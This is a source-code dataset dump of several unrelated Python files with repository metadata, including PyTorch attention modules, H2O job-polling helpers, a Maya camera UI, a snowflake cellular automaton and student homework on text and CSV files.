def get_aca2net(dataset='pascal_voc', backbone='resnet50', pretrained=False,
root='~/.encoding/models', **kwargs):
# infer number of classes
from ..datasets import datasets
model = ACA2Net(datasets[dataset.lower()].NUM_CLASS, backbone=backbone, root=root, **kwargs)
if pretrained:
raise NotImplementedError
return model
class guided_CAM_Module(nn.Module):
""" Position attention module"""
# Ref from SAGAN
def __init__(self, in_dim, out_dim):
super(guided_CAM_Module, self).__init__()
self.chanel_in = in_dim
self.chanel_out = out_dim
self.query_conv = nn.Sequential(
nn.Conv2d(in_channels=in_dim, out_channels=out_dim, kernel_size=1, bias=False), nn.BatchNorm2d(out_dim),
nn.ReLU())
self.key_conv = nn.Sequential(
nn.Conv2d(in_channels=in_dim, out_channels=out_dim, kernel_size=1, bias=False), nn.BatchNorm2d(out_dim),
nn.ReLU())
self.value_conv = nn.Sequential(
nn.Conv2d(in_channels=in_dim, out_channels=out_dim, kernel_size=1, bias=False), nn.BatchNorm2d(out_dim),
nn.ReLU())
self.gamma = nn.Parameter(torch.zeros(1))
self.softmax = nn.Softmax(dim=-1)
def forward(self,x):
"""
inputs :
x : input feature maps( B X C X H X W)
returns :
out : attention value + input feature
attention: B X C X C
"""
m_batchsize, C, height, width = x.size()
proj_query = self.query_conv(x).view(m_batchsize, self.chanel_out, -1)
proj_key = self.key_conv(x).view(m_batchsize, self.chanel_out, -1).permute(0, 2, 1)
energy = torch.bmm(proj_query, proj_key)
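        # Subtract each affinity from its row maximum before the softmax, so the least similar (most distinct) channels get the largest weights (DANet-style CAM).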
energy_new = torch.max(energy, -1, keepdim=True)[0].expand_as(energy)-energy
attention = self.softmax(energy_new)
proj_value = self.value_conv(x)
out = torch.bmm(attention, proj_value.view(m_batchsize, self.chanel_out, -1))
out = out.view(m_batchsize, self.chanel_out, height, width)
out = self.gamma*out + proj_value
return out
class SE_Module(nn.Module):
""" Channel attention module"""
def __init__(self, in_dim, out_dim):
super(SE_Module, self).__init__()
self.se = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)),
nn.Conv2d(in_dim, in_dim // 16, kernel_size=1, padding=0, dilation=1,
bias=True),
nn.ReLU(),
nn.Conv2d(in_dim // 16, out_dim, kernel_size=1, padding=0, dilation=1,
bias=True),
nn.Sigmoid()
)
def forward(self, x):
out = self.se(x)
return out
class guided_SE_CAM_Module(nn.Module):
""" Channel attention module"""
def __init__(self, in_dim, out_dim, norm_layer):
super(guided_SE_CAM_Module, self).__init__()
self.guided_cam = guided_CAM_Module(in_dim, out_dim)
self.project = nn.Sequential(
nn.Conv2d(in_dim, out_dim, kernel_size=1, padding=0, dilation=1, bias=False),
norm_layer(out_dim), nn.ReLU(True),
)
self.se = SE_Module(in_dim, out_dim)
self.relu = nn.ReLU()
def forward(self, x):
"""
inputs :
x : input feature maps( B X C X H X W)
returns :
out : attention value + input feature
attention: B X C X C
"""
gcam = self.guided_cam(x)
bottle = self.project(x)
se_x = self.se(x)
se_bottle = se_x * bottle + bottle
# out = torch.cat([gcam, se_bottle], dim=1)
out = self.relu(se_bottle+gcam)
return out
| [
"[email protected]"
] | |
74181cfa74ae35c7c13033e73dd6978c8ffce412 | 07f837d8c5236fe5e75ef510cd296814452370ce | /py/h2o_jobs.py | 311baeb46561a756eefb1ed044efe40f6157e30d | [
"Apache-2.0"
] | permissive | vkuznet/h2o | 6f9006a5186b964bac266981d9082aec7bc1067c | e08f7014f228cbaecfb21f57379970e6a3ac0756 | refs/heads/master | 2021-08-28T11:37:52.099953 | 2021-08-10T22:43:34 | 2021-08-10T22:43:34 | 20,032,996 | 0 | 0 | Apache-2.0 | 2021-08-10T22:43:35 | 2014-05-21T18:46:27 | Java | UTF-8 | Python | false | false | 9,555 | py | import time, sys
import h2o, h2o_browse as h2b
def pollStatsWhileBusy(timeoutSecs=300, pollTimeoutSecs=15, retryDelaySecs=5):
busy = True
trials = 0
start = time.time()
polls = 0
statSum = {}
# just init for worst case 64 nodes?
lastUsedMemBytes = [1 for i in range(64)]
while busy:
polls += 1
# get utilization and print it
# any busy jobs
a = h2o.nodes[0].jobs_admin(timeoutSecs=60)
busy = False
for j in a['jobs']:
if j['end_time']=='' and not (j['cancelled'] or (j['result'].get('val', None)=='CANCELLED')):
busy = True
h2o.verboseprint("Still busy")
break
cloudStatus = h2o.nodes[0].get_cloud(timeoutSecs=timeoutSecs)
nodes = cloudStatus['nodes']
for i,n in enumerate(nodes):
# check for drop in tot_mem_bytes, and report as "probably post GC"
totMemBytes = n['tot_mem_bytes']
maxMemBytes = n['max_mem_bytes']
freeMemBytes = n['free_mem_bytes']
usedMemBytes = totMemBytes - freeMemBytes
availMemBytes = maxMemBytes - usedMemBytes
print 'Node %s:' % i, \
'num_cpus:', n['num_cpus'],\
'my_cpu_%:', n['my_cpu_%'],\
'sys_cpu_%:', n['sys_cpu_%'],\
'system_load:', n['system_load'],\
'tot_mem_bytes: {:,}'.format(totMemBytes),\
'max_mem_bytes: {:,}'.format(maxMemBytes),\
'free_mem_bytes: {:,}'.format(freeMemBytes),\
'usedMemBytes: {:,}'.format(usedMemBytes)
decrease = round((0.0 + lastUsedMemBytes[i] - usedMemBytes) / lastUsedMemBytes[i], 3)
if decrease > .05:
print
print "\nProbably GC at Node {:}: usedMemBytes decreased by {:f} pct.. {:,} {:,}".format(i, 100 * decrease, lastUsedMemBytes[i], usedMemBytes)
lastUsedMemBytes[i] = usedMemBytes
# don't update lastUsedMemBytes if we're decreasing
if usedMemBytes > lastUsedMemBytes[i]:
lastUsedMemBytes[i] = usedMemBytes
# sum all individual stats
for stat in n:
if stat in statSum:
try:
statSum[stat] += n[stat]
except TypeError:
# raise Exception("statSum[stat] should be number %s %s" % (statSum[stat], stat, n[stat]))
print "ERROR: statSum[stat] should be number %s %s %s" % (statSum[stat], stat, n[stat])
# do nothing
else:
try:
statSum[stat] = n[stat] + 0.0
except TypeError:
pass # ignore non-numbers
trials += 1
if trials%5 == 0:
h2o.check_sandbox_for_errors()
time.sleep(retryDelaySecs)
if ((time.time() - start) > timeoutSecs):
raise Exception("Timeout while polling in pollStatsWhileBusy: %s seconds" % timeoutSecs)
    # now print the means
print "Did %s polls" % polls
statMean = {}
print "Values are summed across all nodes (cloud members), so divide by node count"
for s in statSum:
statMean[s] = round((statSum[s] + 0.0) / polls, 2)
print "per poll mean", s + ':', statMean[s]
return statMean
# statMean['tot_mem_bytes'],
# statMean['num_cpus'],
# statMean['my_cpu_%'],
# statMean['sys_cpu_%'],
# statMean['system_load']
# poll the Jobs queue and wait if not all done.
# Return the keys matching a pattern in 'destination_key'
# for a job (usually a model).
# FIX! the pattern doesn't limit the jobs you wait for (sounds like it does)
# I suppose it's rare that we'd want to wait for a subset of jobs, but
# 'key', 'description' and 'destination_key' could all be interesting things to pattern match against,
# so what the heck, just look for a match in any of the 3 (no regex)
# if pattern is not None, only stall on jobs that match the pattern (in any of those 3)
def pollWaitJobs(pattern=None, errorIfCancelled=False, timeoutSecs=60, pollTimeoutSecs=60, retryDelaySecs=5, benchmarkLogging=None, stallForNJobs=None):
wait = True
waitTime = 0
ignoredJobs = set()
while (wait):
a = h2o.nodes[0].jobs_admin(timeoutSecs=pollTimeoutSecs)
h2o.verboseprint("jobs_admin():", h2o.dump_json(a))
jobs = a['jobs']
busy = 0
for j in jobs:
cancelled = j['cancelled'] or (j['result'].get('val', None)=='CANCELLED')
description = j['description']
destination_key = j['destination_key']
end_time = j['end_time']
key = j['key']
progress = j['progress']
# has exception and val?
result = j['result']
start_time = j['start_time']
# for now, don't ignore any exceptions
if 'exception' in result and result['exception']:
h2o.check_sandbox_for_errors()
msg = "ERROR: pollWaitJobs found a job with a exception result when it shouldn't have:\n %s" % h2o.dump_json(j)
raise Exception(msg)
if result:
# ignore if 'val' is 'OK'
if 'val' in result and result['val'] == 'OK':
pass
else:
print "non-empty result: %s for %s" % (result, key)
if errorIfCancelled and cancelled:
h2o.check_sandbox_for_errors()
print ("ERROR: not stopping, but: pollWaitJobs found a cancelled job when it shouldn't have:\n %s" % h2o.dump_json(j))
print ("Continuing so maybe a json response will give more info")
### h2o.verboseprint(j)
# don't include cancelled jobs here
elif end_time=='' and not cancelled:
if not pattern:
# always print progress if busy job (no pattern used
print "time:", time.strftime("%I:%M:%S"), "progress:", progress, destination_key
h2o.verboseprint("description:", description, "end_time:", end_time)
busy +=1
h2o.verboseprint("pollWaitJobs: found a busy job, now: %s" % busy)
else:
if (pattern in key) or (pattern in destination_key) or (pattern in description):
## print "description:", description, "end_time:", end_time
busy += 1
h2o.verboseprint("pollWaitJobs: found a pattern-matched busy job, now %s" % busy)
# always print progress if pattern is used and matches
print "time:", time.strftime("%I:%M:%S"), "progress:", progress, destination_key
# we only want to print the warning message once
elif key not in ignoredJobs:
jobMsg = "%s %s %s" % (key, description, destination_key)
h2o.verboseprint(" %s job in progress but we're ignoring it. Doesn't match pattern." % jobMsg)
# I guess "key" is supposed to be unique over all time for a job id?
ignoredJobs.add(key)
if stallForNJobs:
waitFor = stallForNJobs
else:
waitFor = 0
print " %s jobs in progress." % busy, "Waiting until %s in progress." % waitFor
wait = busy > waitFor
if not wait:
break
### h2b.browseJsonHistoryAsUrlLastMatch("Jobs")
if (wait and waitTime > timeoutSecs):
print h2o.dump_json(jobs)
raise Exception("Some queued jobs haven't completed after", timeoutSecs, "seconds")
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(retryDelaySecs)
waitTime += retryDelaySecs
# any time we're sitting around polling we might want to save logging info (cpu/disk/jstack)
# test would pass ['cpu','disk','jstack'] kind of list
if benchmarkLogging:
h2o.cloudPerfH2O.get_log_save(benchmarkLogging)
# check the sandbox for stack traces! just like we do when polling normally
h2o.check_sandbox_for_errors()
patternKeys = []
for j in jobs:
# save the destination keys in progress that match pattern (for returning)
if pattern and pattern in j['destination_key']:
patternKeys.append(j['destination_key'])
return patternKeys
def showAllJobs():
print "Showing all jobs"
a = h2o.nodes[0].jobs_admin(timeoutSecs=10)
print h2o.dump_json(a)
#*******************************************************************************************
def cancelAllJobs(timeoutSecs=10, **kwargs): # I guess you could pass pattern
# what if jobs had just been dispatched? wait until they get in the queue state correctly
time.sleep(2)
a = h2o.nodes[0].jobs_admin(timeoutSecs=120)
print "jobs_admin():", h2o.dump_json(a)
jobsList = a['jobs']
for j in jobsList:
if j['end_time'] == '':
b = h2o.nodes[0].jobs_cancel(key=j['key'])
print "jobs_cancel():", h2o.dump_json(b)
# it's possible we could be in a bad state where jobs don't cancel cleanly
pollWaitJobs(timeoutSecs=timeoutSecs, **kwargs) # wait for all the cancels to happen. If we missed one, we might timeout here.
| [
"[email protected]"
] | |
3c145b8ef4e538afdc8b05b7dc35000c6cd14bde | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/429/usersdata/321/107581/submittedfiles/jogoDaVelha.py | b5f5699b08831f08b81685112bfe8cf9f27f5873 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | # -*- coding: utf-8 -*-
from jogoDaVelha_BIB import *
# PLACE YOUR PROGRAM FROM HERE ON
print('Bem vindo ao JogoDaVelha do grupo 8 [Iara, Ingrid, Luiz Otávio, Tatiane]\n')
a=nome()
b=solicitaSimboloDoHumano()
sort=sorteioPrimeiraJogada(a)
if sort==0:
if b == 'X':
c = ' O '
else:
c = ' X '
JogadaComputador(c)
mostrarTabuleiro()
p=JogadaHumana(a,b)
else:
if b == 'X':
c = ' O '
else:
c = ' X '
p=JogadaHumana(a,b)
JogadaComputador(c)
mostrarTabuleiro()
while not verificaVencedor(b,tabuleiro,a):
if sort==0:
if JogadaComputador(c):
mostrarTabuleiro()
JogadaHumana(a,b)
mostrarTabuleiro()
else:
if JogadaHumana(a,b):
if JogadaComputador(c):
mostrarTabuleiro()
#if not jogueNovamente():
#break
| [
"[email protected]"
] | |
af8822c01c2eae258d213fcd4fb4dabd0f0f483b | 9a9e0398f26cee9864d48c4618c0a482e5475e83 | /Python/code/design_browser_history.py | 21040767673ace8a3036f93a95df6462006bd225 | [] | no_license | CNife/leetcode | 92693c653bb41780ee431293286c3e909009e9b0 | 7cdd61692ecb52dd1613169e80b924dd39d35996 | refs/heads/main | 2021-06-22T21:22:12.997253 | 2021-03-18T07:07:15 | 2021-03-18T07:07:15 | 206,955,329 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,124 | py | from typing import List
class BrowserHistory:
def __init__(self, homepage: str):
self.stack: List[str] = [homepage]
self.pointer: int = 0
def visit(self, url: str) -> None:
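        # Visiting from the middle of the history overwrites the next entry and discards any remaining forward history.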
if self.pointer < len(self.stack) - 1:
self.stack[self.pointer + 1] = url
del self.stack[self.pointer + 2 :]
else:
self.stack.append(url)
self.pointer += 1
def back(self, steps: int) -> str:
back_pointer = max(self.pointer - steps, 0)
self.pointer = back_pointer
return self.stack[back_pointer]
def forward(self, steps: int) -> str:
forward_pointer = min(self.pointer + steps, len(self.stack) - 1)
self.pointer = forward_pointer
return self.stack[forward_pointer]
b = BrowserHistory("leetcode.com")
b.visit("google.com")
b.visit("facebook.com")
b.visit("youtube.com")
assert b.back(1) == "facebook.com"
assert b.back(1) == "google.com"
assert b.forward(1) == "facebook.com"
b.visit("linkedin.com")
assert b.forward(2) == "linkedin.com"
assert b.back(2) == "google.com"
assert b.back(7) == "leetcode.com"
| [
"[email protected]"
] | |
6e5c1b6b90f3961a988d8bfcdf41f2994f72480b | b6c4c71dd1544bfc6bc364b4242e9b76401e7372 | /ebicochineal/yukicoder/g81.py | 2e1d5cfc8ad06f1f4c36fda82b6ff2d262b58410 | [] | no_license | ebi-cp/golf | b248f9a7b1a09e6d6c90e141ae5ce1cacbf7c665 | 4ea8f8456fd926051aadc1e88e4014585f483997 | refs/heads/master | 2020-03-17T20:53:06.910302 | 2019-06-20T01:47:59 | 2019-06-20T01:47:59 | 133,932,902 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 110 | py | #! /usr/bin/env python3
from decimal import*
print('{:.10f}'.format(eval("+Decimal(input())"*int(input()))))
| [
"[email protected]"
] | |
8f531582e923fb0fb0831e88beb903ecdecbc8a3 | b521802cca8e4ee4ff5a5ffe59175a34f2f6d763 | /maya/maya-utils/Scripts/Animation/2019-2-15 Tim Cam_Route_Manager/.history/Cam_Main/Cam_Main/Cam_Item_Layout_20190119190257.py | 89fe9b62ef2019192a357e1a4849c612a4a637d1 | [] | no_license | all-in-one-of/I-Do-library | 2edf68b29558728ce53fe17168694ad0353a076e | 8972ebdcf1430ccc207028d8482210092acf02ce | refs/heads/master | 2021-01-04T06:58:57.871216 | 2019-12-16T04:52:20 | 2019-12-16T04:52:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,985 | py | # -*- coding:utf-8 -*-
# Require Header
import os
import json
from functools import partial
# Sys Header
import sys
import traceback
import subprocess
import plugin.Qt as Qt
from Qt.QtCore import *
from Qt.QtGui import *
from Qt.QtWidgets import *
def loadUiType(uiFile):
import plugin.Qt as Qt
if Qt.__binding__.startswith('PyQt'):
from Qt import _uic as uic
return uic.loadUiType(uiFile)
elif Qt.__binding__ == 'PySide':
import pysideuic as uic
else:
import pyside2uic as uic
import xml.etree.ElementTree as xml
from cStringIO import StringIO
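    # For PySide/PySide2, compile the Designer .ui file in memory and recover the generated form class and its Qt base widget class.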
parsed = xml.parse(uiFile)
widget_class = parsed.find('widget').get('class')
form_class = parsed.find('class').text
with open(uiFile, 'r') as f:
o = StringIO()
frame = {}
uic.compileUi(f, o, indent=0)
pyc = compile(o.getvalue(), '<string>', 'exec')
exec pyc in frame
# Fetch the base_class and form class based on their type
# in the xml from designer
form_class = frame['Ui_%s'%form_class]
base_class = eval('%s'%widget_class)
return form_class, base_class
from Qt.QtCompat import wrapInstance
DIR = os.path.dirname(__file__)
UI_PATH = os.path.join(DIR,"ui","Cam_Item_Layout.ui")
GUI_STATE_PATH = os.path.join(DIR, "json" ,'GUI_STATE.json')
form_class , base_class = loadUiType(UI_PATH)
from maya import cmds
class Cam_Item_Layout(form_class,base_class):
def __init__(self,MainWindow):
super(Cam_Item_Layout,self).__init__()
self.setupUi(self)
self.MainWindow = MainWindow
self.Item_Add_BTN.clicked.connect(self.Item_Add_Fn)
self.Item_Clear_BTN.clicked.connect(self.Item_Clear_Fn)
self.Cam_Item_Num = 0
self.Cam_Item_Scroll.verticalScrollBar().valueChanged.connect(self.Scroll_Fn)
self.Scroll_Offset = 0
self.Attr = {}
self.Attr["Add_Crv_LE"] = ""
self.Attr["Add_Motion_Path_LE"] = ""
self.Attr["Add_CamGrp_LE"] = ""
self.Attr["Add_Loc_LE"] = ""
self.Attr["Name"] = ""
        # Note: utility buttons
self.Batch_Keyframe_BTN.clicked.connect(self.Batch_Keyframe_Fn)
self.Select_Path_BTN.clicked.connect(self.Select_Path_Fn)
def Batch_Keyframe_Fn(self):
ChildrenList = self.Item_Layout.children()
for i,child in enumerate(ChildrenList):
if i != 0:
Path = child.Attr["Add_Motion_Path_LE"]
if cmds.objExists(Path):
offset = cmds.keyframe(Path,q=1)[0]
cmds.keyframe("%s.uValue"% Path,e=1,iub=1,r=1,o="over",tc=-offset)
def Select_Path_Fn(self):
cmds.select(cl=1)
ChildrenList = self.Item_Layout.children()
for i,child in enumerate(ChildrenList):
if i != 0:
if cmds.objExists(child.Attr["Add_Motion_Path_LE"]):
cmds.select(child.Attr["Add_Motion_Path_LE"],add=1)
def Item_Add_Fn(self):
self.Cam_Item_Num += 1
return Cam_Item(self,self.MainWindow)
def Item_Clear_Fn(self):
self.Attr["Add_Crv_LE"] = ""
self.Attr["Add_Motion_Path_LE"] = ""
self.Attr["Name"] = ""
for i,child in enumerate(self.Item_Layout.children()):
if i != 0:
child.deleteLater()
def Scroll_Fn(self):
self.Scroll_Offset = self.Cam_Item_Scroll.verticalScrollBar().value()
UI_PATH = os.path.join(DIR,"ui","Cam_Item.ui")
form_class , base_class = loadUiType(UI_PATH)
class Cam_Item(form_class,base_class):
def __init__(self,parent,MainWindow):
super(Cam_Item,self).__init__()
self.setupUi(self)
self.MainWindow = MainWindow
self.Cam_Del_BTN.clicked.connect(self.Cam_Del_BTN_Fn)
self.Cam_Con_CB.stateChanged.connect(self.Cam_Con_CB_Fn)
# Note 初始化创建参数
TotalCount = len(parent.Item_Layout.children())
parent.Item_Layout.layout().insertWidget(TotalCount-1,self)
self.Cam_LE.setText("Cam_Item_%s" % parent.Cam_Item_Num)
self.Cam_Num_Label.setText(u"镜头%s" % TotalCount)
self.setObjectName("Cam_Item_%s" % TotalCount)
self.Num = TotalCount
self.Attr = {}
self.Attr["Add_CamGrp_LE"] = ""
self.Attr["Add_Loc_LE"] = ""
self.Attr["Add_Crv_LE"] = ""
self.Attr["Add_Motion_Path_LE"] = ""
self.Attr["Strat_Time_SB"] = 0
self.Attr["End_Time_SB"] = 0
self.MainWindow.Save_Json_Fun()
def Cam_Del_BTN_Fn(self):
self.deleteLater()
ChildrenList = self.parent().children()
for i,child in enumerate(ChildrenList):
if i != 0:
if i > self.Num:
                    # Note: fix the child's index
child.Num -= 1
child.Cam_Num_Label.setText(u"镜头%s" % (i-1))
child.setObjectName("Cam_Item_%s" % (i-1))
else:
child.Cam_Num_Label.setText(u"镜头%s" % i)
child.setObjectName("Cam_Item_%s" % i)
self.Attr["Add_CamGrp_LE"] = ""
self.Attr["Add_Loc_LE"] = ""
self.Attr["Add_Crv_LE"] = ""
self.Attr["Add_Motion_Path_LE"] = ""
self.Attr["Strat_Time_SB"] = ""
self.Attr["End_Time_SB"] = ""
self.MainWindow.Save_Json_Fun()
def Cam_Con_CB_Fn(self,state):
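        # Keep the per-item "control" checkboxes mutually exclusive: checking one unchecks all the others.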
ChildrenList = self.parent().children()
for i,child in enumerate(ChildrenList):
if i != 0:
if child != self:
child.Cam_Con_CB.blockSignals(True)
child.Cam_Con_CB.setChecked(False)
        if state == 0:
            self.Cam_Con_CB.setChecked(True)
        else:
for i,child in enumerate(ChildrenList):
if i != 0:
if child != self:
child.Cam_Con_CB.blockSignals(False)
| [
"[email protected]"
] | |
ab8798f43f4e62010d729812993d84aa181dc52b | 14373275670c1f3065ce9ae195df142146e2c1a4 | /stubs/python-jose/jose/jws.pyi | 777770ae62ba7928c9ecd32abfe7fdcce15fb17d | [
"Apache-2.0",
"MIT"
] | permissive | sobolevn/typeshed | eb7af17c06a9722f23c337e6b9a4726223155d58 | d63a82640390a9c130e0fe7d409e8b0b836b7c31 | refs/heads/master | 2023-08-04T05:59:29.447015 | 2023-06-14T21:27:53 | 2023-06-14T21:27:53 | 216,265,622 | 2 | 0 | Apache-2.0 | 2022-02-08T10:40:53 | 2019-10-19T20:21:25 | Python | UTF-8 | Python | false | false | 939 | pyi | from collections.abc import Container, Mapping
from typing import Any
from .backends.base import Key
def sign(
payload: bytes | Mapping[str, Any],
# Internally it's passed down to jwk.construct(), which explicitly checks for
# key as dict instance, instead of a Mapping
key: str | bytes | dict[str, Any] | Key,
headers: Mapping[str, Any] | None = None,
algorithm: str = "HS256",
) -> str: ...
def verify(
token: str | bytes,
key: str | bytes | Mapping[str, Any] | Key,
# Callers of this function, like jwt.decode(), and functions called internally,
# like jws._verify_signature(), use and accept algorithms=None
algorithms: str | Container[str] | None,
verify: bool = True,
) -> bytes: ...
def get_unverified_header(token: str | bytes) -> dict[str, Any]: ...
def get_unverified_headers(token: str | bytes) -> dict[str, Any]: ...
def get_unverified_claims(token: str | bytes) -> bytes: ...
| [
"[email protected]"
] | |
83dee180bba344ba4431b5eddabacca981be46a9 | ea378480ba678eb123ef826e3ca0c3eb8f4e538f | /py ref/agg:PIL/05-snowflake.py | 685698ad5cd2aee1ad26a0569fba738e94d596b8 | [] | no_license | msarch/py | 67235643666b1ed762d418263f7eed3966d3f522 | dcd25e633a87cdb3710e90224e5387d3516c1cd3 | refs/heads/master | 2021-01-01T05:21:58.175043 | 2017-05-25T08:15:26 | 2017-05-25T08:15:26 | 87,453,820 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,443 | py | # Snowflake Simulation Using Reiter Cellular Automata
# Source: "A Local Cellular Model for Snow Crystal Growth" by Cliff Reiter
# FB36 - 20130107
import math
import random
from PIL import Image, ImageDraw
imgx = 500; imgy = 500 # image size
imgx1 = imgx - 1; imgy1 = imgy - 1
image = Image.new("RGB", (imgx, imgy))
draw = ImageDraw.Draw(image)
pixels = image.load()
maxIt = 10 # of growth steps
# snowflake will differ depending on values of these parameters:
alpha = random.random() * 1.5 + 0.5
beta = random.random() * 0.3 + 0.3
gamma = random.random() * 0.01
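# Reiter model parameters: alpha is the diffusion weight, beta the background vapor level, gamma the vapor added to receptive cells each step.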
mx = 250; my = 250 # width and height of 2DCA
ca = [[beta for x in range(mx)] for y in range(my)]
caRep = [[beta for x in range(mx)] for y in range(my)] # receptive cells
caNRep = [[beta for x in range(mx)] for y in range(my)] # non-receptive cells
dx = [-1, 0, -1, 1, 0, 1]; dy = [-1, -1, 0, 0, 1, 1] # 6 directions to grow
# these are for coloring the image
while True:
mr0 = 2 ** random.randint(3, 6); mr1 = 256 / mr0
mg0 = 2 ** random.randint(3, 6); mg1 = 256 / mg0
mb0 = 2 ** random.randint(3, 6); mb1 = 256 / mb0
if mr0 != mg0 and mr0 != mb0 and mg0 != mb0: break
ca[(my - 1) / 2][(mx - 1) / 2] = 1.0 # ice seed
for i in range(maxIt): # growth steps
print "Growth Step: " + str(i + 1) + " of " + str(maxIt)
# separate the array into receptive and non-receptive arrays
for iy in range(my):
for ix in range(mx):
receptive = False
if ca[iy][ix] >= 1.0: # ice
receptive = True
else: # check neighbors
for j in range(6):
jx = ix + dx[j]; jy = iy + dy[j]
if jx >= 0 and jx < mx and jy >= 0 and jy < my:
if ca[jy][jx] >= 1.0: # ice
receptive = True
break
if receptive:
caRep[iy][ix] = ca[iy][ix] + gamma
caNRep[iy][ix] = 0.0
else:
caRep[iy][ix] = 0.0
caNRep[iy][ix] = ca[iy][ix]
# new array: weighted averages of the non-receptive array + receptive array
for iy in range(my):
for ix in range(mx):
wsum = caNRep[iy][ix] * (1.0 - alpha * 6.0 / 12.0)
for j in range(6): # neighbors
jx = ix + dx[j]; jy = iy + dy[j]
if jx >= 0 and jx < mx and jy >= 0 and jy < my:
wsum += caNRep[jy][jx] * alpha / 12.0
ca[iy][ix] = caRep[iy][ix] + wsum
# paint final state of the snowflake
an45 = - math.pi / 4.0
sn45 = math.sin(an45); cs45 = math.cos(an45)
scale = math.sqrt(3.0); ox = imgx1 / 2.0; oy = imgy1 / 2.0
for ky in range(imgy):
for kx in range(imgx):
# apply geometric transformation (scaling and rotation)
tx = kx - ox; ty = (ky - oy) * scale
tx0 = tx * cs45 - ty * sn45 + ox
ty = tx * sn45 + ty * cs45 + oy; tx = tx0
if tx >= 0 and tx <= imgx1 and ty >= 0 and ty <= imgy1:
c = ca[int((my - 1) * ty / imgy1)][int((mx - 1) * tx / imgx1)]
if c >= 1.0: # ice
c = int((c - 1.0) * 255)
pixels[kx, ky] = (c % mr0 * mr1, c % mg0 * mg1, c % mb0 * mb1)
label = "alpha = " + str(alpha) + " beta = " + str(beta) + " gamma = " + str(gamma)
draw.text((0, 0), label, (0, 255, 0)) # write to top-left using green color
image.save("Snowflake.png", "PNG")
print "done" | [
"[email protected]"
] | |
c26ce4af3e3326663a505c3563633472e49af3ec | f87f51ec4d9353bc3836e22ac4a944951f9c45c0 | /.history/HW06_20210715232125.py | 82e83460b2b3572ef7ede77011ce58249bbfcda0 | [] | no_license | sanjayMamidipaka/cs1301 | deaffee3847519eb85030d1bd82ae11e734bc1b7 | 9ddb66596497382d807673eba96853a17884d67b | refs/heads/main | 2023-06-25T04:52:28.153535 | 2021-07-26T16:42:44 | 2021-07-26T16:42:44 | 389,703,530 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,842 | py | """
Georgia Institute of Technology - CS1301
HW06 - Text Files & CSV
Collaboration Statement:
"""
#########################################
"""
Function Name: findCuisine()
Parameters: filename (str), cuisine (str)
Returns: list of restaurants (list)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def findCuisine(filename, cuisine):
file = open(filename,'r')
content = file.readlines()
listOfRestaurants = []
for i in range(len(content)):
if content[i].strip() == cuisine:
listOfRestaurants.append(content[i-1].strip()) #add the name of the restaurant, which is the previous line
file.close()
return listOfRestaurants
"""
Function Name: restaurantFilter()
Parameters: filename (str)
Returns: dictionary that maps cuisine type (str)
to a list of restaurants of the same cuisine type (list)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def restaurantFilter(filename):
    cuisineDict = {}
    file = open(filename,'r')
    content = file.readlines()
    cuisines = []
    for i in range(1,len(content),4):
        line = content[i].strip()
        if line not in cuisines:
            cuisines.append(line)
    for i in range(len(cuisines)):
        cuisineDict[cuisines[i]] = []
    for i in range(0,len(content),4):
        line = content[i].strip()
        lineBelow = content[i+1].strip()
        cuisineDict[lineBelow].append(line)
    return cuisineDict
"""
Function Name: createDirectory()
Parameters: filename (str), output filename (str)
Returns: None (NoneType)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def createDirectory(filename, outputFilename):
readFile = open(filename, 'r')
writeFile = open(outputFilename, 'w')
content = readFile.readlines()
fastfood = []
sitdown = []
fastfoodcounter = 1
    sitdowncounter = 1
for i in range(2,len(content), 4):
restaurant = content[i-2].strip()
cuisine = content[i-1].strip()
group = content[i].strip()
if group == 'Fast Food':
fastfood.append(str(fastfoodcounter) + '. ' + restaurant + ' - ' + cuisine + '\n')
fastfoodcounter += 1
else:
            sitdown.append(str(sitdowncounter) + '. ' + restaurant + ' - ' + cuisine)
            sitdowncounter += 1
writeFile.write('Restaurant Directory' + '\n')
writeFile.write('Fast Food' + '\n')
writeFile.writelines(fastfood)
writeFile.write('Sit-down' + '\n')
for i in range(len(sitdown)):
if i != len(sitdown)-1:
writeFile.write(sitdown[i] + '\n')
else:
writeFile.write(sitdown[i])
"""
Function Name: extraHours()
Parameters: filename (str), hour (int)
Returns: list of (person, extra money) tuples (tuple)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def extraHours(filename, hour):
overtime = []
file = open(filename, 'r')
header = file.readline()
content = file.readlines()
for i in content:
line = i.strip().split(',')
name = line[0]
wage = int(line[2])
hoursWorked = int(line[4])
if hoursWorked > hour:
compensation = (hoursWorked - hour) * wage
overtime.append((name, compensation))
return overtime
"""
Function Name: seniorStaffAverage()
Parameters: filename (str), year (int)
Returns: average age of senior staff members (float)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def seniorStaffAverage(filename, year):
averageAge = 0.0
employeeCount = 0
file = open(filename, 'r')
header = file.readline()
content = file.readlines()
for i in content:
line = i.strip().split(',')
age = int(line[1])
yearHired = int(line[3])
if yearHired < year:
averageAge += age
employeeCount += 1
averageAge /= employeeCount
return round(averageAge,2)
"""
Function Name: ageDict()
Parameters: filename (str), list of age ranges represented by strings (list)
Returns: dictionary (dict) that maps each age range (str) to a list of employees (list)
"""
#########################################
########## WRITE FUNCTION HERE ##########
#########################################
def ageDict(filename, ageRangeList):
employeeAgeDictionary = {}
newDict = {}
ageRangesFormatted = []
for i in ageRangeList:
employeeAgeDictionary[i] = []
# print(employeeAgeDictionary)
for i in ageRangeList:
ageRangesFormatted.append(i.split('-'))
# print(ageRangesFormatted)
file = open(filename, 'r')
header = file.readline()
content = file.readlines()
for i in content:
line = i.strip().split(',')
age = int(line[1])
name = line[0]
for j in ageRangesFormatted:
